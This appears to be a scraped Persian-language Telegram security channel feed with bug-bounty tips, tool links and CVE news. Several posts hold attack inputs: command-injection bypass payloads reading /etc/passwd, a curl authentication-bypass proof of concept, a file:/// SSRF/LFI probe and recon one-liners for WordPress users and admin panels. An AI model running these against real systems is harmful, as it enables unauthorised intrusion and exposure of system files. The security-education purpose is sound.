Simple Command Injection Bypass
🚀 https://github.com/swisskyrepo/PayloadsAllTheThings
#BugBounty #RCE #InfoSec
1. cat</etc/passwd
2. {cat,/etc/passwd}
3. cat${IFS}/etc/passwd
4. cat%20/et%5C%0Ac/pa%5C%0Asswd
5. cat echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"🚀 https://github.com/swisskyrepo/PayloadsAllTheThings
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
#BugBounty #RCE #InfoSec
❤3
This media is not supported in your browser
VIEW IN TELEGRAM
File-Smuggling
HTML smuggling is not an evil, it can be useful
https://github.com/eddiechu/File-Smuggling
HTML smuggling is not an evil, it can be useful
https://github.com/eddiechu/File-Smuggling
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
❤4
چک لیست امنیت API🛡:
چک لیستی از مهمترین اقدامات متقابل امنیتی هنگام طراحی، آزمایش و انتشار API شما.
https://github.com/shieldfy/API-Security-Checklist
#cybersecurity #api #hacking #bughunting
چک لیستی از مهمترین اقدامات متقابل امنیتی هنگام طراحی، آزمایش و انتشار API شما.
https://github.com/shieldfy/API-Security-Checklist
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
#cybersecurity #api #hacking #bughunting
❤10👍2
یکی از اینفلوئنسرهای حوزه Ai بنام Robin Eber سایت پایین رو ساخته که بصورت رایگان، پرامپت شما رو آنالیز میکنه و بهش نمره میده.
بهتون میگه که آیا پرامپتتون رو خوب نوشتید یا نه و اگر نه، ایرادش کجاست و چطور میتونید بهترش کنید که بهترین خروجی ممکن رو بگیرید.
https://coach.robinebers.com/
بهتون میگه که آیا پرامپتتون رو خوب نوشتید یا نه و اگر نه، ایرادش کجاست و چطور میتونید بهترش کنید که بهترین خروجی ممکن رو بگیرید.
https://coach.robinebers.com/
Robinebers
Robin Ebers' AI Prompt Coach
Write AI coding prompts that actually work in 30 seconds. 15 proven principles from OpenAI and Anthropic's research teams.
❤6👍1
🚨 3 critical/high FreePBX vulnerabilities disclosed
CVE-2025-66039: Authentication bypass
CVE-2025-61675: SQL injection
CVE-2025-61678: File upload leading to RCE
detection noscripts for these vulns:
https://github.com/rxerium/FreePBX-Vulns-December-25
https://horizon3.ai/attack-research/the-freepbx-rabbit-hole-cve-2025-66039-and-others/
CVE-2025-66039: Authentication bypass
CVE-2025-61675: SQL injection
CVE-2025-61678: File upload leading to RCE
detection noscripts for these vulns:
https://github.com/rxerium/FreePBX-Vulns-December-25
https://horizon3.ai/attack-research/the-freepbx-rabbit-hole-cve-2025-66039-and-others/
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
❤4🏆1
THC Release 💥: The world’s largest IP<>Domain database: https://ip.thc.org
All forward and reverse IPs, all CNAMES and all subdomains of every domain. For free.
Updated monthly.
Try: curl https://ip.thc.org/1.1.1.1
Raw data (187GB): https://ip.thc.org/docs/bulk-data-access
All forward and reverse IPs, all CNAMES and all subdomains of every domain. For free.
Updated monthly.
Try: curl https://ip.thc.org/1.1.1.1
Raw data (187GB): https://ip.thc.org/docs/bulk-data-access
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
❤8🍌2
🤖 Offensive-AI-Agent-Prompts :
یه ریپو که یاد میده چطور از هوش مصنوعی به عنوان Agent امنیتی استفاده میشه ، نه فقط یه چتبات معمولی.
پرامپت ها طوری طراحی شدن که با AI تست نفوذ، تحلیل آسیبپذیری و بررسی امنیتی چجور انجام میشه .
#Ai :
ChatGPT، Gemini-CLI، DeepSeek، Cursor AI، Claude Code و Copilot
-> Pentester، Bug Hunter , Blue Team , red team
https://github.com/CyberSecurityUP/Offensive-AI-Agent-Prompts
یه ریپو که یاد میده چطور از هوش مصنوعی به عنوان Agent امنیتی استفاده میشه ، نه فقط یه چتبات معمولی.
پرامپت ها طوری طراحی شدن که با AI تست نفوذ، تحلیل آسیبپذیری و بررسی امنیتی چجور انجام میشه .
#Ai :
ChatGPT، Gemini-CLI، DeepSeek، Cursor AI، Claude Code و Copilot
-> Pentester، Bug Hunter , Blue Team , red team
https://github.com/CyberSecurityUP/Offensive-AI-Agent-Prompts
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
4👍8🏆2
Mandegar SEC🎩
🤖 Offensive-AI-Agent-Prompts : یه ریپو که یاد میده چطور از هوش مصنوعی به عنوان Agent امنیتی استفاده میشه ، نه فقط یه چتبات معمولی. پرامپت ها طوری طراحی شدن که با AI تست نفوذ، تحلیل آسیبپذیری و بررسی امنیتی چجور انجام میشه . #Ai : ChatGPT، Gemini-CLI،…
وای بچه ها مرسییییییییییی واقعاااا برا استارز😍😍😍😘😘😘😘
❤6🍌4
one liner automation :😎
CSP Bypass Check :
WordPress Enumeration :
☠️ Mass PTR lookup
Exposed Admin Panels
💀 Find Hidden Admin Routes in JS
CSP Bypass Check :
cat alive.txt | httpx -silent -include-response-header | grep -i
cat urls.txt | qsreplace 'param=value1¶m=value2' | httpx -silent -mc 200WordPress Enumeration :
cat alive.txt | httpx -silent -path /wp-json/wp/v2/users -mc 200 |anew wp_users.txt☠️ Mass PTR lookup
prips 192.168.1.0/24 | xargs -P50 -I@ sh -c 'host @ 2>/dev/null | grep "pointer" | cut -d" " -f5' | sed 's/\.$//' | anew ptr_subs.txtExposed Admin Panels
cat alive.txt | httpx -silent -path /admin,/administrator,/admin.php,/wp-admin,/manager,/phpmyadmin -mc 200,301,302 | anew admin_panels.txt💀 Find Hidden Admin Routes in JS
cat js.txt | xargs -I@ curl -s @ | grep -oE "[\"\'][/][a-zA-Z0-9_/-]*(admin|dashboard|manage|config|settings|internal|private|debug|api/v[0-9])[a-zA-Z0-9_/-]*[\"\']" | tr -d "\"'" | sort -u | anew hidden_routes.txt
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
❤5🍌1
CVE-2025-66489 - Authentication Bypass via TOTP Code Presence
curl -X POST http://localhost:3001/api/auth/callback/credentials
-H "Content-Type: application/x-www-form-urlencoded" \
-b cookies.txt \
-c cookies.txt \
-d "csrfToken=<TOKEN>&email=free@example.com&password=WRONG&totpCode=123456"
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
❤6
sanitizer ها
ممکن است به <https://> اجازه دهند فکر کند که این یک لینک خودکار Markdown است. اما اگر به جای یک تگ anchor به صورت HTML خام رندر شود، به یک بردار XSS تبدیل میشود.
در این PoC، مرورگر یک تگ https: سفارشی ایجاد میکند و اجزای URL را به عنوان ویژگیهای HTML تجزیه میکند.
https://storage.googleapis.com/nowaskyjr/xss-url-like-poc1.html
ممکن است به <https://> اجازه دهند فکر کند که این یک لینک خودکار Markdown است. اما اگر به جای یک تگ anchor به صورت HTML خام رندر شود، به یک بردار XSS تبدیل میشود.
در این PoC، مرورگر یک تگ https: سفارشی ایجاد میکند و اجزای URL را به عنوان ویژگیهای HTML تجزیه میکند.
https://storage.googleapis.com/nowaskyjr/xss-url-like-poc1.html
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
❤3👍2🏆2
اگر در حال بررسی سرور IIS ویندوز هستید
یک فایل پیشفرض وجود دارد که میتوانید از آن برای بررسی SSRF یا LFI استفاده کنید:
C:\inetpub\wwwroot\iisstart.png
example : foo?url=file:///C:/inetpub/wwwroot/iisstart.png.
یک فایل پیشفرض وجود دارد که میتوانید از آن برای بررسی SSRF یا LFI استفاده کنید:
C:\inetpub\wwwroot\iisstart.png
example : foo?url=file:///C:/inetpub/wwwroot/iisstart.png.
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
👍4🏆1
the-art-of-pivoting.pdf
16.6 MB
The Art of Pivoting
تکنیک هایی برای تحلیلگران اطلاعات جهت کشف روابط جدید در جهانی پیچیده.
#pivoting #opensource #cti #threatintelligence #misp
تکنیک هایی برای تحلیلگران اطلاعات جهت کشف روابط جدید در جهانی پیچیده.
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
#pivoting #opensource #cti #threatintelligence #misp
❤4🏆2
Zero Trust Security Key Concepts
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
🏆3❤1🍌1
🚨 هشدار فوری
یک آسیبپذیری اجرای کد از راه دور (RCE) با شدت بحرانی (CVSS: 9.9) در پلتفرم اتوماسیون n8n شناسایی شده است.
این نقص امنیتی با شناسه CVE-2025-68613 ثبت شده و به کاربران احرازشده اجازه میدهد کد دلخواه اجرا کنند؛
موضوعی که میتواند به تصاحب کامل سرویس، دسترسی به دادهها و اجرای دستورات سیستمی منجر شود.
بر اساس گزارشها، بیش از 103 هزار نمونه در معرض اینترنت در سطح جهان شناسایی شدهاند که ریسک سوءاستفاده را بهشدت بالا میبرد.
در صورت استفاده از n8n، بررسی و اعمال اصلاحات امنیتی در اولویت فوری قرار دارد.
جزئیات بیشتر:
https://thehackernews.com/2025/12/critical-n8n-flaw-cvss-99-enables.html
#N8N #CVE_2025_68613 #RCE #SecurityAlert
یک آسیبپذیری اجرای کد از راه دور (RCE) با شدت بحرانی (CVSS: 9.9) در پلتفرم اتوماسیون n8n شناسایی شده است.
این نقص امنیتی با شناسه CVE-2025-68613 ثبت شده و به کاربران احرازشده اجازه میدهد کد دلخواه اجرا کنند؛
موضوعی که میتواند به تصاحب کامل سرویس، دسترسی به دادهها و اجرای دستورات سیستمی منجر شود.
بر اساس گزارشها، بیش از 103 هزار نمونه در معرض اینترنت در سطح جهان شناسایی شدهاند که ریسک سوءاستفاده را بهشدت بالا میبرد.
در صورت استفاده از n8n، بررسی و اعمال اصلاحات امنیتی در اولویت فوری قرار دارد.
جزئیات بیشتر:
https://thehackernews.com/2025/12/critical-n8n-flaw-cvss-99-enables.html
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
#N8N #CVE_2025_68613 #RCE #SecurityAlert
2👍7🍌1
This media is not supported in the widget
VIEW IN TELEGRAM
❤5🍌3🏆2
اگه با Cloud Storageها کار میکنی، احتمالاً به rclone نیاز داری.
ابزاری برای بکاپ، سینک و مایگریشن که بهصورت rsync-like بین کلود استوریجها کار میکنه.
ریپو گیت هاب: http://github.com/rclone/rclone
ابزاری برای بکاپ، سینک و مایگریشن که بهصورت rsync-like بین کلود استوریجها کار میکنه.
ریپو گیت هاب: http://github.com/rclone/rclone
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
🍌4❤3